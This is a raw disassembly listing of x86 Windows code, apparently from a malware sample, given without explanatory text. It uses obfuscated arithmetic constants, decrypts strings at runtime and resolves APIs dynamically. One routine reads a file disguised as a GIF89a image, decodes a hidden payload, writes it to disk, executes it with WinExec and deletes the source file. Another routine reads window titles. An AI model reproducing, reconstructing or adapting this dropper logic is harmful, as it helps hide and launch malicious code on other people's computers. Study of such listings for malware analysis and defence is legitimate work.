mov eax, dword_44A164
movsx edx, word_44A170
add eax, edx
sub eax, 6
cmp edi, eax
jnz loc_43ABD8
lea eax, [ebp+var_4]
push eax
push offset dword_44BA58
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word_44A264
add eax, dword_44A1F8
sub eax, 0Ch
cmp edi, eax
jnz loc_43ABCC
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
movsx eax, word_44A150
add eax, dword_44A1EC
sub eax, 10h
cmp edi, eax
jnz loc_43ABC3
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
mov eax, dword_44A0F8
add eax, dword_44A110
sub eax, 0Ch
cmp edi, eax
jz short loc_43AB57
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_43ABC3
; ---------------------------------------------------------------------------
loc_43AB57: ; CODE XREF: sub_43A974+1D3�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_43AB6A
xor ebx, ebx
inc ebx
loc_43AB6A: ; CODE XREF: sub_43A974+1F1�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_43ABC3
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
mov eax, dword_44A268
sub eax, 4
cmp edi, eax
jnz short loc_43ABC3
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_2
push [ebp+var_1002C]
push [ebp+var_4]
call sub_44006A
add esp, 10h
loc_43ABC3: ; CODE XREF: sub_43A974+1A8�j
; sub_43A974+1E1�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43ABCC: ; CODE XREF: sub_43A974+17B�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43ABD8: ; CODE XREF: sub_43A974+C7�j
; sub_43A974:loc_43AA8F�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_43ABDE: ; CODE XREF: sub_43A974+2A�j
; sub_43A974+6B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43A974 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ABE3 proc near ; CODE XREF: sub_439B7B+229�p
; sub_43AF47+37B�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
movsx edi, word_44A208
mov eax, esi
test eax, eax
jge short loc_43AC02
add eax, 0FFh
loc_43AC02: ; CODE XREF: sub_43ABE3+18�j
sar eax, 8
mov ebx, eax
imul ebx, dword_44A128
lea edi, [edi+ebx+1Ah]
mov [ebp+var_8], edi
mov edi, dword_44A280
add edi, 11h
mov eax, esi
test eax, eax
jge short loc_43AC29
add eax, 0FFh
loc_43AC29: ; CODE XREF: sub_43ABE3+3F�j
sar eax, 8
mov ebx, dword_44A270
add ebx, 0Dh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, dword_44A254
add edi, 18h
mov eax, esi
test eax, eax
jge short loc_43AC53
add eax, 0FFFFh
loc_43AC53: ; CODE XREF: sub_43ABE3+69�j
sar eax, 10h
mov ebx, dword_44A138
add ebx, 17h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_43935A
mov ebx, eax
mov [ebp+var_1], bl
mov eax, dword_44A134
add eax, dword_44A220
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43D28C
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_43935A
mov ebx, eax
mov [ebp+var_12], bl
mov eax, dword_44A1A0
add eax, 6Eh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43D28C
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_43935A
mov ebx, eax
mov [ebp+var_14], bl
mov eax, dword_44A1AC
add eax, 2Ah
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43D28C
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_43935A
mov ebx, eax
mov [ebp+var_16], bl
mov eax, dword_44A14C
add eax, 40h
movsx edx, word_44A100
add eax, edx
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43D28C
mov ebx, eax
mov [ebp+var_17], bl
movsx eax, word_44A240
add eax, 41h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43935A
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mov esi, dword_44A19C
add esi, dword_44A12C
sub esi, 0Ch
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_43ADD7
push offset word_44B356
call sub_43C507
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_449634
add esp, 30h
jmp short loc_43AE1B
; ---------------------------------------------------------------------------
loc_43ADD7: ; CODE XREF: sub_43ABE3+1AC�j
push offset byte_44B33B
call sub_43C507
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_449634
add esp, 30h
loc_43AE1B: ; CODE XREF: sub_43ABE3+1F2�j
pop edi
pop esi
pop ebx
leave
retn
sub_43ABE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AE20 proc near ; CODE XREF: sub_43F3B6+15E�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_43AE93
xor eax, eax
jmp loc_43AF42
; ---------------------------------------------------------------------------
loc_43AE58: ; CODE XREF: sub_43AE20+83�j
push esi
push [ebp+arg_0]
call sub_43F932
add esp, 8
mov eax, dword_44A268
dec eax
sub ebx, eax
mov eax, dword_44A274
add eax, dword_44A278
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
movsx eax, word_44A208
movsx edx, word_44A144
add eax, edx
sub eax, 7
lea esi, [esi+eax]
loc_43AE93: ; CODE XREF: sub_43AE20+2F�j
mov eax, dword_44A12C
add eax, dword_44A1A8
sub eax, 7
cmp ebx, eax
jnb short loc_43AE58
movsx eax, word_44A0E8
dec eax
cmp ebx, eax
jbe short loc_43AF22
push 3
movsx eax, word_44A100
movsx edx, word_44A218
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_7]
push eax
call ds:dword_448644
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call ds:dword_448638
push esi
lea eax, [ebp+var_7]
push eax
call sub_43F932
add esp, 20h
mov eax, dword_44A17C
movsx edx, word_44A27C
add eax, edx
sub eax, 6
mov byte ptr [esi+eax], 3Dh
mov eax, dword_44A12C
sub eax, 7
cmp ebx, eax
jnz short loc_43AF17
mov eax, dword_44A274
inc eax
mov byte ptr [esi+eax], 3Dh
loc_43AF17: ; CODE XREF: sub_43AE20+EB�j
mov eax, dword_44A12C
sub eax, 4
lea esi, [esi+eax]
loc_43AF22: ; CODE XREF: sub_43AE20+8F�j
mov eax, dword_44A238
movsx edx, word_44A0A4
add eax, edx
sub eax, 6
mov edx, dword_44A244
sub edx, 4
mov [esi+eax], dl
xor eax, eax
inc eax
loc_43AF42: ; CODE XREF: sub_43AE20+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_43AE20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AF47 proc near ; CODE XREF: sub_43BA75+22E�p
; sub_43BA75+240�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DC4 = byte ptr -30DC4h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D4E = byte ptr -30D4Eh
var_30D46 = byte ptr -30D46h
var_30D43 = byte ptr -30D43h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_442F6C
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, dword_44A244
movsx edx, word_44A0FC
add eax, edx
sub eax, 0Ah
push eax
push 3
push 0
mov eax, dword_44A094
sub eax, 6
push eax
push 80000000h
push [ebp+arg_0]
call ds:dword_449788 ; CreateFileA
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_43B3C7
push 0
lea eax, [ebp+var_30E4C]
push eax
mov eax, dword_44A108
add eax, 7Eh
add eax, dword_44A0C8
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call ds:dword_444028 ; ReadFile
mov [ebp+var_30E44], eax
movsx eax, word_44A16C
dec eax
cmp [ebp+var_30E44], eax
jz loc_43B3A9
cmp [ebp+var_30E3F], 47h
jnz short loc_43B01A
cmp [ebp+var_30E3E], 49h
jnz short loc_43B01A
cmp [ebp+var_30E3D], 46h
jnz short loc_43B01A
cmp [ebp+var_30E3C], 38h
jnz short loc_43B01A
cmp [ebp+var_30E3B], 39h
jnz short loc_43B01A
cmp [ebp+var_30E3A], 61h
jz short loc_43B01F
loc_43B01A: ; CODE XREF: sub_43AF47+A4�j
; sub_43AF47+AD�j ...
jmp loc_43B3A9
; ---------------------------------------------------------------------------
loc_43B01F: ; CODE XREF: sub_43AF47+D1�j
movzx eax, [ebp+var_30E15]
movsx edx, word_44A1DC
mov ecx, dword_44A164
lea edx, [edx+ecx+36h]
cmp eax, edx
jnz short loc_43B04D
cmp [ebp+var_30DBE], 3Dh
jnz short loc_43B04D
cmp [ebp+var_30DBD], 3Dh
jz short loc_43B052
loc_43B04D: ; CODE XREF: sub_43AF47+F2�j
; sub_43AF47+FB�j
jmp loc_43B3A9
; ---------------------------------------------------------------------------
loc_43B052: ; CODE XREF: sub_43AF47+104�j
or ebx, ebx
jnz short loc_43B081
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_440DA6
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_43B3A9
loc_43B081: ; CODE XREF: sub_43AF47+10D�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call ds:dword_444028 ; ReadFile
mov [ebp+var_30E44], eax
mov eax, dword_44A094
sub eax, 6
cmp [ebp+var_30E44], eax
jz loc_43B3A9
mov eax, [ebp+var_30E4C]
mov edx, dword_44A110
add edx, dword_44A268
sub edx, 9
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_438348
add esp, 0Ch
mov esi, eax
mov eax, dword_44A184
mov edi, eax
add edi, dword_44A210
sub edi, 3
jmp short loc_43B14C
; ---------------------------------------------------------------------------
loc_43B107: ; CODE XREF: sub_43AF47+207�j
or ebx, ebx
jz short loc_43B11E
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_43B14B
; ---------------------------------------------------------------------------
loc_43B11E: ; CODE XREF: sub_43AF47+1C2�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_43B14B: ; CODE XREF: sub_43AF47+1D5�j
inc edi
loc_43B14C: ; CODE XREF: sub_43AF47+1BE�j
cmp edi, esi
jb short loc_43B107
or ebx, ebx
jz short loc_43B16D
mov eax, dword_44A254
sub eax, 8
mov edx, esi
sub edx, eax
mov eax, dword_44A274
dec eax
mov [ebp+edx+var_30D40], al
loc_43B16D: ; CODE XREF: sub_43AF47+20B�j
movsx eax, word_44A104
mov edx, dword_44A0A0
movsx ecx, word_44A0E8
add edx, ecx
sub edx, 5
mov [ebp+eax+var_30DC4], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_438348
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_43C2C0
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, dword_44A09C
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_43B3A9
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_43B306
mov eax, dword_44A25C
add eax, dword_44A19C
cmp [ebp+eax+var_30D4E], 64h
jnz short loc_43B276
movzx eax, [ebp+var_30D3F]
movsx edx, word_44A1FC
add edx, 1Bh
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_440511
mov eax, dword_44A25C
sub eax, 8
mov ds:dword_446620, eax
mov eax, dword_44A0AC
dec eax
mov dword_44A350, eax
mov eax, dword_44A148
movsx edx, word_44A0C0
sub edx, 2
mov [ebp+eax+var_30D40], dl
movsx eax, word_44A16C
movsx edx, word_44A0D0
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_43D8DE
add esp, 10h
loc_43B276: ; CODE XREF: sub_43AF47+2B4�j
mov eax, dword_44A0A8
cmp [ebp+eax+var_30D46], 67h
jnz loc_43B3A9
movsx eax, word_44A144
movsx edx, word_44A0D0
add eax, edx
mov edx, dword_44A128
sub edx, 9
mov [ebp+eax+var_30D43], dl
lea eax, [ebp+var_30D3F]
push eax
call ds:dword_444054
mov [ebp+var_61D9C], eax
push eax
push offset dword_449670
call sub_43ABE3
mov eax, dword_44A0F0
dec eax
mov ds:dword_446620, eax
movsx eax, word_44A0FC
sub eax, 6
mov dword_44A350, eax
movsx eax, word_44A144
add eax, dword_44A204
sub eax, 6
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_43D8DE
add esp, 14h
jmp loc_43B3A9
; ---------------------------------------------------------------------------
loc_43B306: ; CODE XREF: sub_43AF47+29B�j
movsx eax, word_44A098
add eax, 5
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_43F353
push offset byte_44B333
call sub_43C507
push eax
lea edx, [ebp+var_30F4B]
push edx
call ds:dword_444020
push 0
push 80h
push 2
push 0
mov eax, dword_44A090
sub eax, 3
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_449788 ; CreateFileA
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call ds:dword_449B8C ; WriteFile
push [ebp+var_61C98]
call ds:dword_448654 ; CloseHandle
push 5
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_4460E0 ; WinExec
movzx eax, [ebp+var_30F51]
push eax
call sub_43B982
add esp, 18h
loc_43B3A9: ; CODE XREF: sub_43AF47+97�j
; sub_43AF47:loc_43B01A�j ...
push [ebp+var_30E48]
call ds:dword_448654 ; CloseHandle
cmp [ebp+var_30F50], 0
jz short loc_43B3C7
push [ebp+arg_0]
call ds:dword_444008 ; DeleteFileA
loc_43B3C7: ; CODE XREF: sub_43AF47+52�j
; sub_43AF47+475�j
pop edi
pop esi
pop ebx
leave
retn
sub_43AF47 endp
; =============== S U B R O U T I N E =======================================
sub_43B3CC proc near ; CODE XREF: sub_43EC0A+16�p
push edi
push offset word_44B326
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2A4, eax
test eax, eax
jnz short loc_43B3FF
push offset byte_44B319
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2A4, eax
loc_43B3FF: ; CODE XREF: sub_43B3CC+1A�j
push offset word_44B306
call sub_43C507
push eax
push dword_44A2A4
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449BB4, eax
push offset word_44B2F2
call sub_43C507
push eax
push dword_44A2A4
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446624, eax
push offset word_44B2E2
call sub_43C507
push eax
push dword_44A2A4
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4460D0, eax
push offset dword_44B2D0
call sub_43C507
push eax
push dword_44A2A4
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4460D8, eax
push offset byte_44B2C1
call sub_43C507
add esp, 14h
push eax
push dword_44A2A4
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449648, eax
pop edi
retn
sub_43B3CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B490 proc near ; DATA XREF: sub_43963B+B�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov esi, [ebp+arg_8]
mov eax, offset sub_43BA5C
mov [esi+0B8h], eax
mov eax, [ebp+arg_4]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
sub_43B490 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_43B4B3 proc near ; CODE XREF: sub_43EC0A+11�p
push edi
push offset dword_44B2B4
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2A0, eax
test eax, eax
jnz short loc_43B4E6
push offset byte_44B2A7
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2A0, eax
loc_43B4E6: ; CODE XREF: sub_43B4B3+1A�j
push offset dword_44B298
call sub_43C507
push eax
push dword_44A2A0
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447250, eax
push offset word_44B286
call sub_43C507
add esp, 8
push eax
push dword_44A2A0
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_445120, eax
pop edi
retn
sub_43B4B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B523 proc near ; CODE XREF: sub_44006A+142�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_442F6C
push ebx
push esi
push edi
mov eax, dword_44A1F4
sub eax, 4
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_440511
add esp, 8
movsx edi, word_44A100
sub edi, 3
jmp short loc_43B571
; ---------------------------------------------------------------------------
loc_43B557: ; CODE XREF: sub_43B523+54�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_43B570
mov eax, dword_44A288
sub eax, 6
mov [ebp+edi+var_FFF], al
loc_43B570: ; CODE XREF: sub_43B523+3C�j
inc edi
loc_43B571: ; CODE XREF: sub_43B523+32�j
cmp edi, 0FFFh
jb short loc_43B557
lea esi, [ebp+var_FFF]
loc_43B57F: ; CODE XREF: sub_43B523+EC�j
push offset word_44B282
call sub_43C507
push offset dword_445020
mov ebx, dword_44A134
movsx edx, word_44A0B0
add ebx, edx
sub ebx, 0Fh
push ebx
mov ebx, dword_44A20C
movsx edx, word_44A250
add ebx, edx
sub ebx, 7
push ebx
push eax
mov ebx, dword_44A224
sub ebx, 5
push ebx
push 0
push esi
push [ebp+arg_0]
mov ebx, dword_44A1D4
add ebx, dword_44A1C4
sub ebx, 5
and ebx, 0FFh
push ebx
call sub_43D058
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43B5E8: ; CODE XREF: sub_43B523+CA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B5E8
movsx edx, word_44A1E0
sub edx, 2
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, dword_44A25C
sub edx, 8
cmp eax, edx
jnz loc_43B57F
pop edi
pop esi
pop ebx
leave
retn
sub_43B523 endp
; =============== S U B R O U T I N E =======================================
sub_43B61A proc near ; DATA XREF: .data:0044A3A8�o
mov eax, 80004001h
retn 10h
sub_43B61A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B622 proc near ; CODE XREF: sub_44006A+1A1�p
; sub_44006A+1C2�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call ds:dword_449770 ; GetTickCount
mov [ebp+var_8], eax
mov esi, dword_44A140
sub esi, 9
jmp short loc_43B689
; ---------------------------------------------------------------------------
loc_43B642: ; CODE XREF: sub_43B622+79�j
cmp ds:dword_445130[esi*4], 0
jz short loc_43B688
mov edx, ds:dword_448660[esi*4]
mov ecx, dword_44A0C8
add ecx, 0EA5Fh
movsx eax, word_44A0E8
add ecx, eax
mov eax, dword_44A0A8
add eax, dword_44A1E8
sub eax, 2
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_43B688
and ds:dword_445130[esi*4], 0
loc_43B688: ; CODE XREF: sub_43B622+28�j
; sub_43B622+5C�j
inc esi
loc_43B689: ; CODE XREF: sub_43B622+1E�j
mov eax, dword_44A0F0
add eax, 3E4h
add eax, dword_44A13C
cmp esi, eax
jb short loc_43B642
loc_43B69D: ; CODE XREF: sub_43B622+99�j
; sub_43B622+281�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_43B8A9
mov eax, dword_44A244
cmp [ebp+var_14], eax
ja short loc_43B69D
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_43B6C2: ; CODE XREF: sub_43B622+A5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B6C2
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
movsx edx, word_44A264
add edx, dword_44A204
sub edx, 6
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
mov eax, dword_44A204
sub eax, 1
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_43B6FC
mov [ebp+var_1], 43h
loc_43B6FC: ; CODE XREF: sub_43B622+D4�j
mov edi, dword_44A0EC
sub edi, 4
jmp short loc_43B72E
; ---------------------------------------------------------------------------
loc_43B707: ; CODE XREF: sub_43B622+121�j
cmp ds:dword_445130[edi*4], 0
jz short loc_43B72D
mov edx, [ebp+var_C]
cmp ds:dword_444060[edi*4], edx
jnz short loc_43B72D
mov dl, ds:byte_446200[edi]
cmp dl, [ebp+var_1]
jz loc_43B888
loc_43B72D: ; CODE XREF: sub_43B622+ED�j
; sub_43B622+F9�j
inc edi
loc_43B72E: ; CODE XREF: sub_43B622+E3�j
mov eax, dword_44A194
add eax, 3D9h
movsx edx, word_44A0FC
add eax, edx
cmp edi, eax
jb short loc_43B707
mov eax, dword_44A168
add eax, 3BEh
movsx edx, word_44A260
add eax, edx
cmp [ebp+var_10], eax
jbe loc_43B831
mov eax, dword_44A0F8
add eax, 7
movsx edx, word_44A16C
add eax, edx
push eax
lea eax, [ebp+var_4F]
push eax
call sub_43F353
add esp, 8
mov eax, dword_44A0AC
add eax, 3BFh
mov [ebp+var_18], eax
movsx eax, word_44A0FC
add eax, dword_44A1F8
sub eax, 9
mov [ebp+var_1C], eax
loc_43B79F: ; CODE XREF: sub_43B622+20A�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, dword_44A114
movsx ecx, word_44A1B4
add edx, ecx
sub edx, 0Ch
mov [ebx+eax], dl
push offset dword_445020
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, dword_44A1EC
add eax, dword_44A0A0
sub eax, 0Ch
and eax, 0FFh
push eax
call sub_43D058
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, dword_44A1B0
add eax, 3B6h
movsx edx, word_44A118
add eax, edx
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_43B824
mov [ebp+var_18], eax
loc_43B824: ; CODE XREF: sub_43B622+1FD�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_43B883
jmp loc_43B79F
; ---------------------------------------------------------------------------
loc_43B831: ; CODE XREF: sub_43B622+139�j
push offset byte_44B27D
call sub_43C507
push offset dword_445020
push [ebp+var_10]
movsx edx, word_44A100
add edx, dword_44A1F8
sub edx, 6
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx edx, word_44A0FC
movsx ecx, word_44A0D0
add edx, ecx
sub edx, 0Dh
and edx, 0FFh
push edx
call sub_43D058
add esp, 28h
loc_43B883: ; CODE XREF: sub_43B622+208�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_43B888: ; CODE XREF: sub_43B622+105�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
mov edx, dword_44A1F8
add edx, 0Bh
add edx, dword_44A094
cmp [eax], edx
jbe loc_43B69D
loc_43B8A9: ; CODE XREF: sub_43B622+8B�j
push offset off_44B279
call sub_43C507
push offset dword_445020
movsx edx, word_44A1F0
movsx ecx, word_44A27C
add edx, ecx
sub edx, 7
push edx
movsx edx, word_44A170
sub edx, 2
push edx
push eax
mov edx, dword_44A140
add edx, dword_44A244
sub edx, 0Dh
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, dword_44A1AC
add edx, dword_44A210
sub edx, 5
and edx, 0FFh
push edx
call sub_43D058
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_43B622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B912 proc near ; DATA XREF: sub_439992+26�o
var_1FFF = byte ptr -1FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2000h
call sub_442F6C
push esi
push edi
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push [ebp+arg_0]
call ds:dword_449BA4 ; GetWindowTextA
push offset dword_44B264
call sub_43C507
mov edi, dword_44A224
add edi, dword_44A134
sub edi, 0Ch
push edi
push eax
lea edi, [ebp+var_1FFF]
push edi
call sub_4384B5
add esp, 10h
mov esi, dword_44A198
add esi, 0FFFDh
cmp eax, esi
jz short loc_43B979
push [ebp+arg_0]
call sub_4393B1
pop ecx
